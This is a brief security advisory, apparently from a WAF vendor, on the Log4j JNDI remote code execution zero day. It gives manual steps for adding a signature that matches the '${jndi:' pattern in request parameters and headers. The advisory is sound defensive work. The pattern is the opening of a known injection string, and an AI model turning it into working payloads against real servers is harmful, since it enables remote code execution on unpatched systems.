Recently a new zero day vulnerability was discovered in Log4j, which has not yet been officially assigned a CVE.
Vulnerability description:
Log4j versions prior to 2.15.0 are subject to a remote code execution vulnerability via the ldap JNDI parser.
Mitigation:
Cloud WAF customers and On-Prem customers that have the “SecureSphere Emergency Feed” are already protected OOTB.
Below are the manual mitigation steps to address the vulnerability:
- Create a new manual dictionary, or use an existing one (ensure it is applied in a policy).
- Create a new signature (inside the dictionary from the previous step)
- Signature name:
Zero day RCE in Log4j via ldap JNDI parser
- Signature pattern
part="${jndi:"
- Search Signature in:
Parameters, Headers